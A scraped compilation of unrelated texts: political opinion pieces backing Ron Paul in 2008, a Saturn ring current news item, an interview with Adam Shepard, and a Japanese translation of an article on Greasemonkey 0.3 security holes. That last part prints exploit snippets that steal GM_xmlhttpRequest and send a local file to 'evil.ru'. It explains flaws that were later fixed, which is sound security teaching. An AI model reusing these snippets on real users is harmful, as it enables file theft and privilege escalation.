Implicit assumptions that advisors have only their own selfish interests at heart can do little more than to discourage students from trying their hand at research and to offend advisors who care sincerely about their students .
The publication of exceptional research is in the best interest of both the student and the advisor , but this may not always happen without some encouragement and pressure at the right times .
Carl Fiser
( Smithtown , N.Y. )
Many contend that Ron Paul , although an honest , plain - talking man , comes to the 2008 presidential campaign podium without a lot of achievement .
While in office , he has n’t steer - headed proposed legislation into law , or galvanized broad - based support for this national agenda or that , or even been on board with most post - 911 bills and actions .
For almost twenty years , he ’s been a dedicated representative for his Texas District and has not a potpourri of achievements about which to boast on the presidential campaign trail .
Is this exactly true ?
How could someone serve for so long , and have so little to show for it ?
At this time , I should share a story I heard from two entertainers at my son ’s grade school .
The entertainers were turning books from different parts of the world into short , little plays , in order to spark the children ’s interest in reading .
The following story took place centuries ago in the Far East .
The wise , old emperor was keenly aware that he was getting along in years , and he worried about finding a suitable replacement to lead the people .
One day , he solicited the young people of his kingdom to gather , and he shocked them by telling them that he would be stepping down and that he would choose one of them to be his successor .
“ I am going to give each one of you a seed today , a very special seed .
I want you to plant the seed , water it and come back here one year from today with what you have grown from the seed .
I will then judge the plants that you bring , and the one I choose will be the next emperor ! ”
One young man named Ling , a son of a farmer , was there that day , and he was certain that he could cultivate that seed better than anyone else .
He got a pot , filled it with rich soil and watered it carefully .
Day after day , he checked the pot .
Weeks passed by , then months , and still nothing had grown .
Other youths from the kingdom began to talk about their plants and flowers and trees , but Ling said nothing .
He was sure that he somehow had killed the seed .
After a year had passed , all the youths of the kingdom brought their plants to the emperor for inspection .
Ling ’s first inclination was not to attend , but he showed up that day , sick to his stomach .
He was amazed at the plants that the others had brought .
They were of all different varieties and all so beautiful .
Some of the others made fun of Ling ’s empty pot and others felt pity for him .
Ling stood toward the back of the crowd .
The emperor looked over the vast array and seemed pleased .
Then , he spotted Ling standing at the back of the room with his empty pot , and he ordered his guards to bring the young man to the front .
Ling was led grudgingly , fearful that he may be punished for his utter failure .
The emperor asked his name .
“ My name is Ling , ” he replied .
Now , all the youths were laughing and making fun .
The emperor then announced to the crowd , “ Behold your new emperor !
His name is Ling ! ”
The emperor continued ,
One year ago today , I gave everyone here a seed .
I told you to take the seed , plant it , water it and bring it back to me today .
But I gave you all boiled seeds which would not grow .
The rest of you substituted your own seeds for the one I gave you , but Ling was the only one with the courage and honesty to bring me a pot with my seed in it .
Therefore , he is the one who will be your new emperor !
Ron Paul , like Ling , is a great truth - teller .
His voting record is one of the most consistent
this writer has ever seen .
No flip - flops are to be found .
As well , he is a courageous and wise man , and a heck of an economist .
Just ask the Wall Streeters .
However , he bears to his fellow countrymen ( and countrywomen ) , an empty pot .
He ca n’t claim to have brought you wars or higher taxes , which we now have .
He never brought you an unbalanced budget , which is a perennial joke .
He never voted himself a wage increase and , to this day , gives back part of his salary every year .
He has always voted to preserve the Constitution , cut government spending , lower healthcare costs , end the war on drugs , secure our borders with immigration reform and protect our civil liberties .
Sorrowfully , he was outvoted or shot down on all measures .
The Constitution has been chiseled down , government spending is through the roof , healthcare costs are out of control , the war on drugs keeps getting less effective , immigration issues remain unresolved and our civil liberties have been crimped for our own safety .
I ’ll just throw in that Ron Paul opposes regulation of the internet , which has been a revolution in the exchange of ideas , this article being a case in point .
The eye - popping reality of the situation is this .
No longer can it be said that Ron Paul is running for President .
Amazingly enough , his candidacy has been hijacked , and it appears now that the people are running for President .
. . through Ron Paul !
That ’s the true revolution about which your neighbors are speaking .
So , do you want the plants and flowers that your other government representatives have cultivated for you year after year , or do you want an open and honest effort at change , not for the powerful interests , but for you and for members of your family yet to arrive .
If you want to see an unprecedented effort at change – starting with the only man on the campaign trail who is not afraid to tell you the truth – your action must start now .
Get informed .
Get angry .
Get talking to your neighbors .
Then , get to the voting booths !
Disclaimer : News articles on this site may contain opinions of the author , and if opinion , may not necessarily reflect the views of the site itself or the views of the owners of NewsLI.com , Long Island Media Inc. , or Long Island Exchange® .
For more information on our editorial policies please view our terms of service
" The U.S. dollar is the linchpin of not only the American economy but also the world monetary system . "
Those words were the lead of an editorial in this newspaper on August 21 , 1978 , amid the inflation of the 1970s and the world 's last great dollar crisis .
Are we watching another such period today ?
It 's not inevitable , but this week we all got a reminder of what such a thing looks like , and it is n't pretty .
The dollar is " losing its status as the world currency , " declared Xu Jian , a middling official at China 's central bank , ...
Tags
I have never had much enthusiasm for following politics ; I found that a blanket condemnation of the whole subspecies Officeseeker stood me in good stead and saved me time to focus on more useful things , such as Lindsey Lohan 's current status . [ 1 ]
I have never willingly given money to any politician , never pitched a chirpy phone call to a fellow citizen reminding them that today is election day , never joined any political party whatsoever , feeling that those who do missed the whole point of the Federalist Papers .
Admittedly , every four years I 'd do my civic duty and throw my vote down the Libertarian Party 's maw .
That 's as far as my active support for the libertarian crowd went until last Friday night , when I wrote a relatively large check in support of Ron Paul , allowing me entrée into a private reception held at a fabulously gorgeous penthouse in New York City .
I drank the red , surrounded by fifty or so other donors .
Naturally I had a nice time hanging with the Four Figure Donor Crowd , which like any such event gets you a handshake , a few words , and a picture with the candidate .
Nice speech , nice time , nice man .
Ron Paul holds the distinction of being , in my opinion , probably the only member of Congress our Founders would not find cause to shun .
His ideological outlook towards power is frozen in 1776 , leading to a remarkable consistency in his actions and words despite a 30 - year public life .
My little brother Tommy — yet another 20 - something newly minted fan — is reading Mr. Paul 's A Foreign Policy of Freedom .
His admiring review : " He 's been giving the same speech since 1976 . "
But despite Ron Paul 's books , speeches , and meeting the man in person , what really opened my eyes to what his campaign is all about was in meeting the supporters who gathered at a Chelsea location afterwards , in drinking and smoking with the Decidedly Less Than Four Figure Crowd .
Show me your friends , show me yourself ; so I believe .
Ron Paul represents something , and the man is just a conduit for what a nightclub full of earnest young people represent , for what they believe .
Among these young supporters is where I met the real Ron Paul , or , more to the point , the Ron Paul movement .
The Kids Are Alright
" One thing only has been lent to youth and age in common — discontent . " — Matthew Arnold
From what I 've read on the web , Ron Paul attracts a rather … umm … oddball sort of crowd , so to speak .
From the attractive brunette bartender who , along with drinks , served warnings of a " one world government " to our new friend Casey Holland telling us , in amazing detail , how 9 - 11 was a set - up , be forewarned that when Ron Paul supporters gather , conspiracy theories will fall like manna from heaven .
Since I 've read Harvard professor Bernard Bailyn's Ideological Origins of the American Revolution , in which he devotes an entire section to our Founder 's unshakable belief in conspiracies , I found this trait more admirable than amusing .
Judging by our history books , which are littered with politically sponsored bloodbaths , viewing the political class with extreme suspicion and distrust seems only rational .
Having been refused accommodations by the New York Republican Party , [ 2 ] about two hundred Ron Paul supporters found their own space , a cavernous hall that featured the standard bar , couches , nooks and crannies to hide in , and , according to one participant who'd been there before , was used on occasion as a sex club .
The oddball nature of the venue fit the crowd like a glove .
P.J. O'Rourke once wrote that if you want to see which way the wind is blowing , follow the pretty girls .
If this is so , then from the Ron Paul Girl to the aptly named Angel who I spoke to at the after party , Ron Paul is the wave of the future . [ 3 ]
But the most striking feature of the crowd was not looks , but youth .
Most of them seem to be web savvy , with the ability , at minimum , to hack into any news studio's voting system , be it text or Internet based .
[ 4 ]
My wife warned me to keep an eye on my Blackberry , lest it fall into evil hands .
You could n't turn around without seeing a video camera perched on someone 's shoulder .
While the crowd 's attachment to the Internet was on display ( the event was put together in four days via the net ) what they really seem to love is video . [ 5 ]
In one of the hall 's nooks , a video interview room was born , and if you search the web I 'm sure the results are on there somewhere .
The Ron Paul campaign 's attitude towards recording and disseminating their events and literature reminds me of the Grateful Dead 's : feel free .
The entire night — hell the entire movement — seems rather unscripted and spontaneous .
So why do they all support Ron Paul ?
Doubtless , the war plays a part , but MoveOn.org could n't pull this off — I 've been to some of their events and the turnout was n't even close .
I asked Jessica , who was leaning on a bar with her friend Chris , what it was about Ron Paul that attracted them , and she gave me the same answer I would hear all night .
" You know , " she said , " it 's about freedom , and having rights . "
Like almost everyone I asked , they had only known about Ron Paul for " a couple of months , " yet were willing to pay $ 100 each to drink to his health .
His hold on this crowd goes deeper than merely being antiwar .
One flyer given to me by a young bearded kid read , " Who is Ron Paul ? " and listed his beliefs , as expressed by his voting record .
Pro-gun , antitax , for freedom of the Internet , anti–Patriot Act — his opposition to the war was listed near the bottom , almost like an afterthought .
The people I spoke to were more about how Ron Paul matches their urge for " freedom and rights " than on any specific issue he stands on .
Between the informational handouts , bumper stickers , the ubiquitous video cameras , a promotional CD mixed by a Brooklyn based duo called The Statue of David , and the crowd 's radical feeling towards the establishment , the after party had all the markings of the '60s , without that sad generation 's lust for and admiration of power .
Whatever the traditional media polls say , this man has struck a chord among quite a few of the young .
The night was a happening , as much as a tired forty - year - old can make it out to be .
This presidential campaign 's hippest candidate , perched right on the cutting edge of radical , is a 72 - year - old grandfather who complimented his suit with a pair of black sneakers .
No Grand Visions , Please
" If you 're going to plan something , go ahead and plan it … just do n't do it . " — Lewis Black , comedian
In political science , a guy much smarter than I am once said , " There is much to learn and little to do . "
Ron Paul 's Big Plan is that there is no Big Plan .
That is what Ron Paul stands for , and more importantly , what the club full of 20 - somethings stands for .
They do n't want any grand visions rammed down their throats and , more importantly , they do n't want to ram them down anyone else 's .
They lack the egotistical arrogance that socialism requires for its implementation .
Ron Paul 's people , his " fanatics " ( or at least the few score I sampled ) understand the concept that underlies all civilized people : a respect for your neighbors ' property .
These kids I talked to were untouched by America , despite growing up within her cocoon .
Not one spoke about how much we needed to fund whatever agreed - upon vision had stuck fast this news cycle ; nobody was riding a high of painless charity paid for with Other People 's Money .
A tolerant bunch , they were n't looking to prevent their fellow Americans from eating , drinking , or smoking whatever they wished .
And they were all college - age kids or very recent grads , from 18 - year - old Brian from Florida , clutching a Ron Paul flag for a car he did n't yet own , to 29 - year - old Jessica , who has taken two Middle Eastern holidays courtesy of Uncle Sam , to a 19 - year - old kid wrapped in an American flag whose name was drowned out by the DJ .
I was reminded of an old MTV " Rock the Vote " feature that I watched years ago .
[ 6 ]
The MTV journalist roamed from sea to shining sea , asking my fellow stoners What They Wanted The Government To Do For Them .
Of course , a Christmas list was presented from each young voter when questioned .
But the people I spoke to at the after party are n't of that type ; they understand where Santa Claus gets all that loot .
Buying Hope , One Donation At A Time
" America , when will you be idyllic ? " — from the CD " Ron Paul 2008 " by the Statue of David
The most difficult part of the night was finding the person or persons who organized the event .
No matter who I asked the answer was always a shrug and a reference to the Internet ; one drunken girl shouted " Everybody ! " and spun about in circles .
Eventually , I located someone who was involved , Brad Tirpak , a gentleman who helped organize the after party over a four - day span . [ 7 ]
He believes that this campaign is just taking off , that eventually " People will wake up to the truth . "
Maybe he 's onto something .
If in this day and age so far down the road from the New Deal my city can produce this many liberal - minded youth , maybe all is n't despair .
All the silence about Ron Paul on the evening news and the newspapers that ignore him mean far less than in the past because the Republican pundits have Internet connections and so do millions of young Americans .
They , too , can see the cash - raising ability of Mr. Paul , how he crushes their anointed successors in the online polls , and the large crowds he draws — which is why Mr. Paul , and only Mr. Paul , was specifically asked in the Detroit debates whether or not he'd run as a third - party candidate .
" If the Republicans are worried , maybe that 's a good sign , " I shouted to my wife over the music .
In a moment of euphoria , I turned and drunkenly advised Ed , a Newark , New Jersey native clad in Mets gear , " Go ahead and dig up yer ' gold ! " but I doubt he heard me .
He was too busy saying that if it was n't for Ron Paul , he 'd vote for Hillary Clinton .
Ed considers himself " sort of a socialist . "
So I sobered up and came back down to earth .
In the early stages of the party , before the names and conversations blurred with fun , I spoke to a gentleman from New Jersey — Jason was his name — more of my age and far more sober minded .
We both agreed that Ron Paul 's chances of becoming president are slim to none , forget what the Vegas odds makers say .
Recognizing him as a Four Figure fellow , I asked him why then did he hand over so much money to Mr. Paul 's campaign .
He thought about it and gave me the answer to the same question I 'd been asking of myself : " I 'm buying hope , " he shrugged .
As Carl Menger would agree , hope has a price , too .
Water can be more costly than a diamond under the right circumstances , and so can hope .
Yet , despite a wife who deserves diamond earrings but instead gave them away to the longest of long shots , despite the fact that when I mentioned his name at a business dinner a week prior every single person at the table knew who Ron Paul was , and despite the large chunk of cash I handed over to buy it , I will admit I still do n't have a lot of hope .
But considering the future — as embodied by a mob of college - age kids willing to spontaneously party to benefit a 72 - year - old grandfather who promises them nothing other than to leave them alone — maybe , just maybe , I should have a little more .
Howard Switzer
Howard has been designing passive solar , ecologically - minded homes for over 30 years .
His commitment to healthy , low - impact shelter led him to straw bale and cob construction fifteen years ago .
With a strong foundation in space planning Howard ’s designs help lessen the footprint and honor the art of building .
A series of images from Cassini's MIMI instrument , which shows energetic neutral atom emission from Saturn 's ring current .
The images indicate the field rotates with Saturn in a counter - clockwise direction .
HomerSimpson , meet your match in space : Astronomers have confirmed the existence ofa lopsided " doughnut " of electrified plasma surrounding Saturn .
The giantring current , as the doughnut is called , was confirmed following analysis of recentCassini spacecraft data .
But the new information adds a twist to the electricphenomenon , which extends more than 746,000 miles ( 1.2 million kilometers ) intospace :
It rotates .
DonMitchell , an astrophysicist at Johns Hopkins University and co-author of a newstudy detailed in the Dec. 13 issue of the journal Nature , revealed histeam 's initial findings at a conference earlierthis year , but said the new study now confirms them .
He explained that mostof Saturn 's ring current plasma comes from its ice - spewing moon Enceladus .
" Earth 'sring current is made of upper atmosphere and solar wind particles , so it 'smostly hydrogen , " Mitchell said .
" But Saturn 's source is by and largeEnceladus , which shoots out a whole lot of oxygen in the form of water . "
Mitchellexplained that sunlight zaps the water and turns it into charged particlescalled ions , which Saturn 's magnetic field captures and turns into a tube ofenergized plasma .
The pressure of the solar wind , however , smears thenight - side half of the ring into a sheet of plasma that continuously driftsinto space .
UnlikeEarth 's relatively stationary ring current , however , Saturn 's rotates with theplanet , Mitchell said .
" Earthrotates pretty slow compared to the speed of the ring current particles , so thething is stationary , " he said .
But Saturn rotates more than twice as fastas Earth , dragging Saturn 's heavy oxygen ions around the planet in acounter - clockwise direction .
Although the Cassini data resolves the mystery of Saturn 's ring — which the existence of , Mitchell said , was only speculative 25 years ago — it has uncovered a new one .
" There 'sa point during the rotation where we see an energy spike , so there 's somethingspecial about a particular spot on Saturn , " he said .
" For now , though , we do n't know what it could be . "
Alone on a dark gritty street , Adam Shepard searched for a homeless shelter .
He had a gym bag , $ 25 , and little else .
A former college athlete with a bachelor 's degree , Mr. Shepard had left a comfortable life with supportive parents in Raleigh , N.C.
Now he was an outsider on the wrong side of the tracks in Charles­ton , S.C .
But Shepard 's descent into poverty in the summer of 2006 was no accident .
Shortly after graduating from Merrimack College in North Andover , Mass. , he intentionally left his parents ' home to test the vivacity of the American Dream .
His goal : to have a furnished apartment , a car , and $ 2,500 in savings within a year .
To make his quest even more challenging , he decided not to use any of his previous contacts or mention his education .
During his first 70 days in Charleston , Shepard lived in a shelter and received food stamps .
He also made new friends , finding work as a day laborer , which led to a steady job with a moving company .
Ten months into the experiment , he decided to quit after learning of an illness in his family .
But by then he had moved into an apartment , bought a pickup truck , and had saved close to $ 5,000 .
The effort , he says , was inspired after reading " Nickel and Dimed , " in which author Barbara Ehrenreich takes on a series of low - paying jobs .
Unlike Ms. Ehrenreich , who chronicled the difficulty of advancing beyond the ranks of the working poor , Shepard found he was able to successfully climb out of his self - imposed poverty .
He tells his story in " Scratch Beginnings : Me , $ 25 , and the Search for the American Dream . "
The book , he says , is a testament to what ordinary Americans can achieve .
On a recent trip to the Boston , he spoke about his experience :
Becoming a mover and living in a homeless shelter – that had n't been part of your life before .
How much did your lifestyle actually change ?
Shepard :
It changed dramatically .
There were simple luxuries that I did n't afford myself .
I had to make sacrifices to achieve the goals that I set out .
One of those was eating out .
I did n't have a cellphone .
Especially in this day and age , that was a dramatic change for me ....
I was getting by on chicken and Rice - A - Roni dinner and was happy .
That 's what I learned ... we lived [ simply ] , but still we were happy .
But surely your background – you 're privileged ; you have an education and a family – made it much easier for you to achieve .
I did n't use my college education , credit history , or contacts [ while in South Carolina ] .
But in real life , I had these lessons that I had learned .
I do n't think that played to my advantage .
How much of a college education do you need to budget your money to a point that you 're not spending frivolously , but you 're instead putting your money in the bank ?
Do you need a college education ?
I do n't think so .
To be honest with you , I think I was disadvantaged , because my thinking was inside of a box .
I have the way that I lived [ in North Carolina ] – and to enter into this totally new world and acclimate to a different lifestyle , that was the challenge for me .
Still , there was that safety net .
Were you ever tempted to tap your past work , education , or family networks ?
I was never tempted .
I had a credit card in my back pocket in case of an emergency .
The rule was if I used the credit card then , " The project 's over , I 'm going home . "
So what did you tell people when they asked what you were doing ?
That was the only touchy part of my story .
I had this great back story on how I was escaping my druggy mom and going to live with my alcoholic dad .
Things just fell apart , and there I was at the homeless shelter .
I really embellished this fabricated story and told it to anyone who would listen .
The interesting thing is that nobody really cared ....
It was n't so much as where we were coming from , it was where we were going .
Would your project have changed if you 'd had child - care payments or been required to report to a probation officer ?
Would n't that have made it much harder ?
The question is n't whether I would have been able to succeed .
I think it 's the attitude that I take in : " I 've got child care .
I 've got a probation officer .
I 've got all these bills .
Now what am I going to do ?
Am I going to continue to go out to eat and put rims on my Cadillac ?
Or am I going to make some things happen in my life ...? "
One guy , who arrived [ at the shelter ] on a Tuesday had been hit by a car on [ the previous ]
Friday by a drunk driver .
He was in a wheelchair .
He was totally out of it .
He was at the shelter .
And I said , " Dude , your life is completely changed . "
And he said , " Yeah , you 're right , but I 'm getting the heck out of here . "
Then there was this other guy who could walk and everything was good in his life , but he was just kind of bumming around , begging on the street corner .
To see the attitudes along the way , that is what my story is about .
You made it out of the shelter , got a job , and opened a bank account .
Did you meet other people who had similar experiences ?
Oh , absolutely .
We do n't need " Scratch Beginnings " to know that millions of Americans are creating a life for themselves from nothing ....
Just as millions of Americans are not getting by .
There are both ends of the spectrum .
To meet that guy [ in the wheelchair ] at the shelter , [ makes you wonder ]
' Can he get out and go to college and become a doctor ? '
Maybe , maybe not .
I think he can set goals .....
You can use your talents .
That 's why , from the beginning , I set very realistic goals : $ 2,500 , a job , car .
This is n't a " rags - to - riches million - dollar " story .
This is very realistic .
I truly believe , based on what I saw at the shelter ... that anyone can do that .
Greasemonkeyの過去においてのセキュリティ上の問題の解説。
Greasemonkeyだけに限らず、JavaScriptによるユーザ拡張を作成している全ての方に対して一読の価値があるドキュメントだと思われます。
原文 ：O'Reilly Media - Technology and Business Training
Greasemonkeyの共通な落とし穴を避ける Greasemonkeyのセキュリティの歴史があなたの今にどう影響するのか
(著) Mark pilgrim " Greasemonkey Hacks " の著 者
2005/11/11
昔々、あるところにセキュリティホールがありました。（これは普通のおとぎ話ではないからそのまま読んでください。）
Greasemonkeyのアーキテクチャは最初に書かれて以来大幅に変更されてきた。Version0.3は初めて広範囲に人気を得たバージョンだが本質的にセキュリティフローを抱えていた。ユーザスクリプトを注入して実行するときに、リモートページを信頼しすぎてしまった。
その時を振り返ると 、Greasemonkeyのインジェクションメカニズムはシンプルでエレガントで、そして間違っていた。API関数の集合をグローバルなwindowオブジェクトのプロパティとして初期化していた。そうすることでユーザスクリプトがそれらを呼ぶことができるように。それからどのユーザスクリプトが現在のページにて実行されるべきか@includeと@excludeのパラメタで決定した。各ユーザスクリプトのソースコードをロードして、<script>要素を作成し、<script>要素のコンテントとしてユーザスクリプトのソースコードをアサインした。そしてページに要素を挿入した。全てのユーザスクリプトの実行が完了するとすぐに、Greasemonkeyは自身が挿入した<script>要素を消し、自身が付け加えたグローバルなプロパティを消去することによりページを片付けた。
まったくシンプルでエレガントだ。だからいったい何を間違えてしまったのだろうか？
セキュリティホー ル # 2 : API 漏 洩 Greasemonkeyの最もパワフルな機能はユーザスクリプトを第3者のWebページに挿入できることではない。ユーザスクリプトは通常の非特権的なJavaScriptにはできないことができる。なぜならばGreasemonkeyがユーザスクリプトに向けたAPI関数の集合を与えるからだ。
GM_setValue : スクリプト固有の値をFirefoxのpreferenceデータベースに格納する。格納した値はabout:configを指定することで見ることができ、Greasemonkey上でフィルタリングできる
GM_getValue : スクリプト固有の値をFirefoxのpreferenceデータベースから取得する。ユーザスクリプトは自身で格納した値のみアクセスできる。他のユーザスクリプトや他のブラウザ拡張や、Firefox自身が格納した値にアクセスすることはできない。
GM_log : JavaScriptコンソールにメッセージを記録する
GM_registerMenuCommand : Toolsメニュー下のユーザスクリプトコマンドメニューにメニューアイテムを追加する。
GM_xmlhttpRequest : 任意のURLに任意のヘッダと任意のデータでGETまたはPOSTのリクエストを行う。
この最後 のAPI関数は明らかに最もパワフルだ。それに最も使い勝手が良い。なぜならばユーザスクリプトに異なるサイトとのデータ交換を行うことを可能とするからだ。Greasemonkey
Hacksでは第11章をGM_xmlhttpRequestに充てている。
通常 のWebページから落としたJavaScriptコードはこれができない。XMLHttpRequestオブジェクトは同じような機能をいくつか持っている。しかしセキュリティ上の理由のため、Firefoxはわざとそれが同じサイトの異なるページとコミュニケートすることのみに制限している。GreasemonkeyのGM_xmlhttpRequest関数はこの制限を緩めユーザスクリプトに好きなWebサイトとコミュニケートすることを可能としている。どこのWebサイトとでも、いつでも、だ。
これら全てが我々を次のセキュリティホールに導く。Greasemonkey0.3はリモートページのスクリプトにソースコードを盗むことを許すだけでなくGreasemonekyのAPI関数へのアクセス権をも盗ませてしまうのだ。
< script type= " text/ javascript " >
_GM_xmlhttpRequest = null ; function trapGM ( prop , oldVal , newVal ) { _GM_xmlhttpRequest = window .
GM_xmlhttpRequest ; return newVal ; } window . watch ( " GM_log " , trapGM ) ; </ script >
全てのJavaScriptオブジェクトに存在するwatchメソッドを用いることにより、WebページはGreasemonkey0.3がGM_log関数をwindowオブジェクトに追加をするのを待つことが可能だ。少なくとも１つのユーザスクリプトがそのページにて実行される限り、いつでもこの状態が起こりうる。それはGreasemonkeyがユーザスクリプトを実行させる<script>要素を挿入するまさに直前だ。Greasemonkeyがwindow.GM_log要素をアサインするとき、Firefoxはリモートページが用意したtrapGM関数を呼んでしまうだろう。リモートページはwindow.GM_xmlhttpRequestへの参照を盗み、後の使用のために保存するだろう。
ユーザスクリプトは何もなかったように実行される。そしてGreasemonkeyは自身をwindowオブジェクトからAPI関数を削除することにより消し去るだろう。しかしダメージは既に与えられている。リモートページはその時点でもGM_xmlhttpRequest関数への参照を保存している。そしてこの関数への参照を通常のJavaScriptコードでは許可されないことが前提とされている事柄を行うのに使用することが可能になる。
セキュリティのエキスパートはこれを特権昇格攻撃と呼ぶ。事実上、Greasemonkey0.3は非特権JavaScriptコードをサンドボックスに入れる注意深いプランを立てることを怠ってしまった。そして非特権コードが特権関数へのアクセスを得られるようにしてしまった。
しかしこれで終わりではない。事態はさらに悪化する。
セキュリティホール#3 ： ローカルファイルアクセス Greasemonkey0.3にはもう1つ致命的な穴があった。GETリクエストをローカルファイルを指し示すfile://のURLに発行することにより、ユーザスクリプトはローカルのハードディスク上にあるどのファイルの内容でもアクセスし、リードすることが可能であった。これはそれ自身でも不安にさせる。しかしリモートページスクリプトへのAPI関数漏洩と一緒になった時に非常に危険なのだ。これらのセキュリティホールのコンビネーションはリモートページスクリプトがGM_xmlhttpRequest関数への参照を盗み、それを呼ぶことでハードディスク上のどんなファイルでも読むことができることを意味する。そしてもう一度呼ぶだけでそのファイルの中身を世界中のどこにでも送ることができることを示す。
< script type= " text/ javascript " > _GM_xmlhttpRequest ( { method : " GET " , url : " file:///c:/boot.ini " , onload : function ( oResponseDetails ) { _GM_xmlhttpRequest ( { method : " POST " , url : " http://evil.ru/ " , data : oResponseDetails.responseText } ) ; } } ) ; </ script >
徹底的な再設 計 Greasemonkey0.3に存在するこれらの問題全ては１つの根本的なアーキテクチャの欠陥に起因する。実行される環境を安易に信じすぎた。デザイン的に、ユーザスクリプトは敵意ある環境にて実行される。第3者のコントロールの下にある任意のWebページ上にてだ。我々は半ば信頼された、半ば権限委譲を行ったコードをその環境で実行したい。しかし我々は可能性として敵意あるコードに対しその信頼、またはその権限を漏らしたくはない。
解決方法はユーザスクリプト環境を実行することができる安全な環境を準備することだ。サンドボックスは敵意ある環境のいくらかのパーツに対しアクセスする必要がある。例えばWebページのDOMだ。しかし悪意あるページのスクリプトに対し、ユーザスクリプトの邪魔をさせたり、特権関数への参照を傍受させたりは絶対にさせてはならない。サンドボックスは一方通行で、ユーザスクリプトに対しページの操作を許可するが、逆方向には何もさせない。
Greasemoneky0.5はユーザスクリプトをサンドボックスの中で実行する。<script>要素をオリジナルのページに挿入することはない。またグローバルなwindowオブジェクト上にAPI関数を定義することもない。リモートページスクリプトはユーザスクリプトを傍受することはできない。なぜならばユーザスクリプトはそのページを変更することなしに実行されるからだ。
しかしこれではまた戦いの半分だ。ユーザスクリプトはWebページを変更するために関数を呼ぶ必要があるだろう。これにはdocument.getElementsByTagNameやdocument.createElementのようなDOMメソッドを含む。またグローバルな関数、例えばwindow.alertやwindow.getComputedStyleのようなものも含む。悪意あるWebページはこれらの関数を再定義しユーザスクリプトが正常に動作することを阻むか、または全体で全く違うことを実行させてしまう。
この2つ目の問題を解決するために、Greasemonkey0.5はFirefoxのあまり知られていない機能であるXPCNativeWrapperを使用する。単純にwindowオブジェクトやdocumentオブジェクトを参照する代わりに、GreasemonkeyはこれらをXPCNatvieWrapperに対し再定義する。XPCNativeWrapperは実際のオブジェクトへの参照をラップする。しかし下層に存在するオブジェクトに対しメソッドの再定義やプロパティの傍受を許しはしない。つまりユーザスクリプトがdocument.createElementを呼んだ時、本当のcreateElementメソッドであることを保障する。リモートページにより再定義されたランダムなメソッドの類ではない。
より深く検証してみよう。
Greasemonkey0.5では、ユーザスクリプトが実行されるサンドボックスはwindowとdocumentオブジェクトをXPCNativeWrapperの奥に定義する。これによりそれらのメソッドを呼ぶことやそれらのプロパティにアクセスすることがが安全であるだけでなく、それらの返り値であるオブジェクトに対するメソッド呼び出しやプロパティへのアクセスが安全であることを意味する。
例として、documentgetElementsByTagName関数を呼び、返り値の複数の要素に対しループするユーザスクリプトを書きたいとする。 var arTextareas = document .getElementsByTagName( ' textarea ' ) ; for ( var i = arTextareas.
length - 1 ; i >= 0 ; i--) { var elmTextarea = arTextareas [ i ] ; elmTextarea.value = my_function(elmTextarea.value ) ; }
documentオブジェクトは本当のdocumentオブジェクトのXPCNativeWrapperである。そのためユーザスクリプトはdocument.getElementsByTagNameを呼べるし、本当のgetElementsByTagNameメソッドを呼んでいることを知ることができる。しかしメソッドが返した要素オブジェクトの集合に対してはどうだろうか？これらの要素も全てXPCNativeWrapperである。つまりそれらのプロパティ、例えばvalueプロパティに対しアクセスすることやメソッドを呼ぶことも安全だ。
集合(collection ) 自体はどうであろうか？document.getElementsByTagName関数は通常はHTMLCollectionオブジェクトを返す。このオブジェクトはlengthのようなプロパティや特別なgetterメソッドを持ち、JavaScriptの配列であるかのように扱うことができる。しかしそれは配列ではない。オブジェクトだ。ユーザスクリプトのコンテキストではこのオブジェクトもまたXPCNativeWrapperにてラップされている。つまりlengthプロパティにアクセスすることもできるし、本当のlengthプロパティを得ていることを知ることもできる。リモートページにより再定義された危険なgetter関数を呼んでいるわけではない。
このこと全ては理解しにくいかもしれない。しかし非常に重要なことだ。このユーザスクリプトの例はあなたが普段のWebページの一部として書くコードとまったく同じように見えるだろう。そして全く同じことをして終了する。しかし理解する必要があるのはユーザスクリプトのコンテキストでは、全てがXPCNativeWrapperにてラップされていることだ。documentオブジェクトもHTMLCollectionもそして全ての要素もまた関係するオブジェクトにXPCNativeWrapperしたものである。
Greasemonkey0.5は通常のJavaScriptコードに見えるコードを相当の量書くことを可能にする。そして通常のJavaScriptコードがするだろうと期待する内容を実行させることができる。しかし幻想は完璧ではない。XPCNativeWrapperには理解しなければならない限界がある。Greasemonkeyのスクリプトを書くときそこには10個の共通な落とし穴がある。そしてそれら全てはXPCNativeWrapperの限界を中心に展開するのだ。
落とし穴#1：自動評価文字列
一定の時間後に関数を実行するwindow.setTimeoutのようなコールバック関数を設定したい場所に、JavaScriptはコールバックを文字列として定義することを許可する。コールバックが実行される時に、Firefoxは文字列を評価し、実行する。これが最初の落とし穴に導く。
ユーザスクリプトがmy_funcという関数を定義するとしよう。以下のコードは1秒遅れてmy_func()を実行するように見える。 window .setTimeout( " my_func ( ) " , 1000 ) ;
これ はGreasemonkeyのスクリプトでは動かない。my_func関数は絶対に実行されない。1秒後にコールバックが実行される時、ユーザスクリプトとそのサンドボックス全体は見えなくなる。window.setTimeout関数は1秒後に存在するそのページのコンテキスト内でJavaScriptコードを評価する。しかしそのページにはmy_func関数は含まれない。事実、ページがmy_func関数を持つことは絶対にない。その関数はGreasemonkeyのサンドボックスの中にのみ存在しうるのだ。
しかしこれは、タイムアウトを使うことができないという意味ではない。ただその設定の仕方が異なるのだ。以下に同じコードを、ユーザスクリプトのコンテキスト内にて実行される書き方にて示す。 window .setTimeout( my_func , 1000 ) ; 違いは何だろうか ?
my_func関数が文字列の代わりに１つのオブジェクトとして直接参照される。window.setTimeout関数に対し関数参照を渡すとそれが実行されるまでその参照が保持される。設定した時間が過ぎたとき、my_func関数をまだ呼ぶことができる。なぜならばJavaScriptは関数の参照を生きたまま持っているからだ。どこかで、何かが、関数への参照を保持している限りこれが成り立つ。
落とし穴#2：イベントハンドラー もう1つのJavaScriptでの共通なパターンは、onclickやonchange、onsubmitなどのイベントハンドラを設定する場合だ。最も一般的なonclickのイベントハンドラの設定方法は、要素のonclickプロパティに対し文字列を設定することだ。
var elmLink = document .getElementById ( ' somelink ' ) ; elmLink.onclick = ' my_func ( this ) ' ; このテクニックはユーザスクリプトではwindow.setTimeoutの呼び出しが失敗したのと同じ理由により失敗する。ユーザがリンクをクリックした時に、my_func関数はユーザスクリプトの他の場所で定義されており、もはや存在しない。
それではonclickのコールバックを直接設定してみよう。 var elmLink = document .getElementById( ' somelink ' ) ; elmLink.onclick = my_func ;
